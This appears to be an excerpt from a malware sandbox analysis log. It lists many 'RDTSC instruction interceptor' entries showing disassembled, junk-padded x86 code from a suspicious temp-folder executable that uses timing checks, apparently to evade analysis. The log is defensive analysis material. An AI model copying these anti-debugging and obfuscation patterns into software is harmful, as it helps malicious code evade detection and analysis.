                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A90374 second address: 4A90383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A90383 second address: 4A9045C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx ebx, cx 0x0000000d pushfd 0x0000000e jmp 00007FAF7CBD5D46h 0x00000013 jmp 00007FAF7CBD5D45h 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FAF7CBD5D43h 0x00000022 or eax, 417F945Eh 0x00000028 jmp 00007FAF7CBD5D49h 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 mov ax, 64C3h 0x00000036 pushfd 0x00000037 jmp 00007FAF7CBD5D48h 0x0000003c adc si, 6788h 0x00000041 jmp 00007FAF7CBD5D3Bh 0x00000046 popfd 0x00000047 popad 0x00000048 mov eax, dword ptr [ebp+08h] 0x0000004b jmp 00007FAF7CBD5D46h 0x00000050 and dword ptr [eax], 00000000h 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FAF7CBD5D47h 0x0000005a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A9045C second address: 4A904B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d jmp 00007FAF7C6A41AEh 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov eax, edx 0x00000018 pushfd 0x00000019 jmp 00007FAF7C6A41B9h 0x0000001e jmp 00007FAF7C6A41ABh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A7011E second address: 4A7013A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, cx 0x00000007 popad 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAF7CBD5D3Fh 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A7013A second address: 4A70140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A70140 second address: 4A70144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A80E26 second address: 4A80E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A80E2C second address: 4A80E8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov al, 2Dh 0x0000000c mov si, dx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov cx, bx 0x00000015 pushfd 0x00000016 jmp 00007FAF7CBD5D45h 0x0000001b adc cx, 9276h 0x00000020 jmp 00007FAF7CBD5D41h 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007FAF7CBD5D3Eh 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FAF7CBD5D3Ah 0x00000038 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A80E8E second address: 4A80E94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A80E94 second address: 4A80E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A80E9A second address: 4A80E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A9012C second address: 4A90135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 9514h 0x00000008 popad 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A90135 second address: 4A9015D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7C6A41B7h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A9015D second address: 4A901D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007FAF7CBD5D40h 0x0000000c adc ah, 00000028h 0x0000000f jmp 00007FAF7CBD5D3Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a jmp 00007FAF7CBD5D3Fh 0x0000001f jmp 00007FAF7CBD5D48h 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 jmp 00007FAF7CBD5D40h 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FAF7CBD5D3Ah 0x00000036 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A901D1 second address: 4A901E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A901E0 second address: 4A901E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 843Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A901E9 second address: 4A9020E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7C6A41B9h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A9020E second address: 4A90212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A90212 second address: 4A90218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AB0765 second address: 4AB081F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF7CBD5D40h 0x00000009 and ax, C518h 0x0000000e jmp 00007FAF7CBD5D3Bh 0x00000013 popfd 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ecx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FAF7CBD5D40h 0x00000021 adc ah, 00000078h 0x00000024 jmp 00007FAF7CBD5D3Bh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007FAF7CBD5D48h 0x00000030 and ax, 49D8h 0x00000035 jmp 00007FAF7CBD5D3Bh 0x0000003a popfd 0x0000003b popad 0x0000003c mov eax, dword ptr [774365FCh] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push edx 0x00000045 pop eax 0x00000046 pushfd 0x00000047 jmp 00007FAF7CBD5D47h 0x0000004c or ecx, 31BB594Eh 0x00000052 jmp 00007FAF7CBD5D49h 0x00000057 popfd 0x00000058 popad 0x00000059 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AB081F second address: 4AB0855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 7662h 0x00000007 jmp 00007FAF7C6A41B3h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test eax, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAF7C6A41B5h 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AB0855 second address: 4AB0865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D3Ch 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AB0993 second address: 4AB09A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AB09A2 second address: 4AB09C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx ecx, dx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AB09C6 second address: 4AB0A33 instructions: 0x00000000 rdtsc 0x00000002 call 00007FAF7C6A41AFh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b ret 0x0000000c nop 0x0000000d push eax 0x0000000e call 00007FAF80B753EBh 0x00000013 mov edi, edi 0x00000015 pushad 0x00000016 movsx edx, ax 0x00000019 mov bx, ax 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e jmp 00007FAF7C6A41B4h 0x00000023 push eax 0x00000024 pushad 0x00000025 mov cl, dl 0x00000027 jmp 00007FAF7C6A41AAh 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e jmp 00007FAF7C6A41B0h 0x00000033 mov ebp, esp 0x00000035 pushad 0x00000036 jmp 00007FAF7C6A41ADh 0x0000003b popad 0x0000003c pop ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AB0A33 second address: 4AB0A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AB0A37 second address: 4AB0A3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AB0A3D second address: 4AB0A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AB0A43 second address: 4AB0A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60016 second address: 4A60044 instructions: 0x00000000 rdtsc 0x00000002 mov ah, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, si 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov dl, 79h 0x0000000e call 00007FAF7CBD5D46h 0x00000013 mov edx, esi 0x00000015 pop esi 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b mov esi, edx 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60044 second address: 4A60109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAF7C6A41B0h 0x0000000a and esi, 4CFC63D8h 0x00000010 jmp 00007FAF7C6A41ABh 0x00000015 popfd 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov ax, 60ABh 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 and esp, FFFFFFF8h 0x00000025 jmp 00007FAF7C6A41B3h 0x0000002a xchg eax, ecx 0x0000002b pushad 0x0000002c mov ecx, 4A54908Bh 0x00000031 popad 0x00000032 push eax 0x00000033 jmp 00007FAF7C6A41ACh 0x00000038 xchg eax, ecx 0x00000039 pushad 0x0000003a mov cx, 832Dh 0x0000003e movzx ecx, dx 0x00000041 popad 0x00000042 push ecx 0x00000043 jmp 00007FAF7C6A41B2h 0x00000048 mov dword ptr [esp], ebx 0x0000004b jmp 00007FAF7C6A41B0h 0x00000050 mov ebx, dword ptr [ebp+10h] 0x00000053 jmp 00007FAF7C6A41B0h 0x00000058 xchg eax, esi 0x00000059 jmp 00007FAF7C6A41B0h 0x0000005e push eax 0x0000005f pushad 0x00000060 popad 0x00000061 xchg eax, esi 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FAF7C6A41ABh 0x0000006b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60109 second address: 4A60126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60126 second address: 4A60179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FAF7C6A41AEh 0x00000011 xchg eax, edi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FAF7C6A41AEh 0x00000019 adc esi, 088E53A8h 0x0000001f jmp 00007FAF7C6A41ABh 0x00000024 popfd 0x00000025 mov edx, eax 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov ch, DEh 0x0000002e popad 0x0000002f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60179 second address: 4A60209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FAF7CBD5D40h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 mov bl, cl 0x00000014 mov esi, ebx 0x00000016 popad 0x00000017 je 00007FAFEF5241A1h 0x0000001d jmp 00007FAF7CBD5D45h 0x00000022 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FAF7CBD5D3Ch 0x00000030 add eax, 208765F8h 0x00000036 jmp 00007FAF7CBD5D3Bh 0x0000003b popfd 0x0000003c mov ah, 1Fh 0x0000003e popad 0x0000003f je 00007FAFEF524172h 0x00000045 jmp 00007FAF7CBD5D3Bh 0x0000004a mov edx, dword ptr [esi+44h] 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60209 second address: 4A6020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A6020D second address: 4A60228 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60228 second address: 4A6023D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 872Ah 0x00000007 mov cx, dx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d or edx, dword ptr [ebp+0Ch] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A6023D second address: 4A60244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, EFh 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60244 second address: 4A6024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A6024A second address: 4A6024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A6024E second address: 4A6028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e jmp 00007FAF7C6A41B4h 0x00000013 jne 00007FAFEEFF25BEh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FAF7C6A41B7h 0x00000020 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A6028F second address: 4A602CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d pushad 0x0000000e mov si, 1C33h 0x00000012 mov bh, ah 0x00000014 popad 0x00000015 jne 00007FAFEF52411Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAF7CBD5D3Eh 0x00000022 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A602CE second address: 4A602D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 61E2FBE4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A602D8 second address: 4A602F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test bl, 00000007h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7CBD5D44h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50846 second address: 4A508EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d call 00007FAF7C6A41B4h 0x00000012 push eax 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 mov ax, bx 0x00000018 popad 0x00000019 push esp 0x0000001a pushad 0x0000001b movzx ecx, di 0x0000001e pushad 0x0000001f mov di, CB52h 0x00000023 pushfd 0x00000024 jmp 00007FAF7C6A41B3h 0x00000029 jmp 00007FAF7C6A41B3h 0x0000002e popfd 0x0000002f popad 0x00000030 popad 0x00000031 mov dword ptr [esp], ebx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FAF7C6A41B4h 0x0000003b sbb ax, 1BC8h 0x00000040 jmp 00007FAF7C6A41ABh 0x00000045 popfd 0x00000046 mov eax, 50BDDD3Fh 0x0000004b popad 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FAF7C6A41B1h 0x00000054 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A508EC second address: 4A508FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D3Ch 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A508FC second address: 4A50914 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50914 second address: 4A50918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50918 second address: 4A5091E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A5091E second address: 4A50924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50924 second address: 4A509AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAF7C6A41B4h 0x00000013 xor ecx, 40AE2618h 0x00000019 jmp 00007FAF7C6A41ABh 0x0000001e popfd 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FAF7C6A41B6h 0x00000026 jmp 00007FAF7C6A41B5h 0x0000002b popfd 0x0000002c mov edi, eax 0x0000002e popad 0x0000002f popad 0x00000030 mov esi, dword ptr [ebp+08h] 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 call 00007FAF7C6A41AFh 0x0000003b pop ecx 0x0000003c popad 0x0000003d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A509AB second address: 4A50A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c mov ah, dl 0x0000000e pushfd 0x0000000f jmp 00007FAF7CBD5D46h 0x00000014 jmp 00007FAF7CBD5D45h 0x00000019 popfd 0x0000001a popad 0x0000001b test esi, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FAF7CBD5D3Dh 0x00000024 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50A08 second address: 4A50A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF7C6A41B7h 0x00000008 pushfd 0x00000009 jmp 00007FAF7C6A41B8h 0x0000000e xor ax, 2388h 0x00000013 jmp 00007FAF7C6A41ABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007FAFEEFF9AE5h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FAF7C6A41B5h 0x00000029 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50A6C second address: 4A50B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov si, C873h 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 mov ecx, esi 0x0000001b pushad 0x0000001c jmp 00007FAF7CBD5D41h 0x00000021 call 00007FAF7CBD5D40h 0x00000026 pushfd 0x00000027 jmp 00007FAF7CBD5D42h 0x0000002c adc eax, 5CD53DD8h 0x00000032 jmp 00007FAF7CBD5D3Bh 0x00000037 popfd 0x00000038 pop esi 0x00000039 popad 0x0000003a je 00007FAFEF52B5FDh 0x00000040 pushad 0x00000041 mov ax, bx 0x00000044 mov ecx, edi 0x00000046 popad 0x00000047 test byte ptr [77436968h], 00000002h 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FAF7CBD5D46h 0x00000055 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50B08 second address: 4A50B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAF7C6A41B1h 0x00000008 pop eax 0x00000009 call 00007FAF7C6A41B1h 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jne 00007FAFEEFF9A2Ah 0x00000018 pushad 0x00000019 mov cx, bx 0x0000001c mov edx, 023C5C0Ch 0x00000021 popad 0x00000022 mov edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50B4B second address: 4A50B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50B4F second address: 4A50B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50B55 second address: 4A50BC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FAF7CBD5D3Ah 0x00000010 mov dword ptr [esp], ebx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FAF7CBD5D3Eh 0x0000001a xor ch, FFFFFF88h 0x0000001d jmp 00007FAF7CBD5D3Bh 0x00000022 popfd 0x00000023 mov esi, 3FB57EFFh 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b push ecx 0x0000002c call 00007FAF7CBD5D47h 0x00000031 pop esi 0x00000032 pop edi 0x00000033 movzx ecx, di 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jmp 00007FAF7CBD5D3Dh 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 rdtsc
